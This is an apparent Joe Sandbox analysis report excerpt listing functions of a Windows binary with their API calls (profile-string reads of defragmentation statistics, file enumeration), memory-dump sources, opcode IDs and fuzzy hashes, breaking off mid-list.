                                                                                                                                                                                                                                                                                                • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                                Function 004112B7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                Function 004112B9 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                Function 00438779 Relevance: 17.7, Strings: 14, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                                • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                                • Opcode ID: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                                • Instruction ID: a1250dd2abae281965bcbcd99bbab5f3ca081c7f2ebc100e0f91383b9a449a5d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F9122A2D052A88AF720C625EC04BEBB775EF95301F1881FAD40C67781D67E0EC68F52
                                                                                                                                                                                                                                                                                                Function 00438766 Relevance: 17.7, Strings: 14, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                                • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                                • Opcode ID: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                                • Instruction ID: 758bb074f1e02f5d219d83cb07dd28aa7128d3b2f90bd517896020da9daeb34d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 787135A2D096A88AF7218625EC047EBB775DF91301F0890F9D44CA7781D67E0FC68F26
                                                                                                                                                                                                                                                                                                Function 0044D58E Relevance: 16.8, Strings: 13, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: JM<5$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-2011736602
                                                                                                                                                                                                                                                                                                • Opcode ID: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                                • Instruction ID: 63136df9b4e2b9ab88fafee4aab420784887feb0363108930222d5ca6ea7e0ef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A92211B1D046698AFB208B24DC40BEAB7B5FF84310F1481FAD80DA7681D6784FC28F56
                                                                                                                                                                                                                                                                                                Function 00436ED8 Relevance: 15.4, Strings: 12, Instructions: 356COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                                • Instruction ID: 566fded381b5c44124f86d85541a2f214abba5eb8d90c512736025a7e78c9a4c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD15BB2D082189AF7248A24DC94BFB7675EF94310F0881FAD44D97780D67E0FC58B66
                                                                                                                                                                                                                                                                                                Function 00436E36 Relevance: 15.3, Strings: 12, Instructions: 286COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b04957f8641a02fe2ad15b2e7decd8342e4988316b47231fcf7e75471d053ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05A199A2D182549AF7208A24DC50BFB6679EF94310F0881FED54D976C0E67F0FC58B6A
                                                                                                                                                                                                                                                                                                Function 00436E5E Relevance: 15.3, Strings: 12, Instructions: 271COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
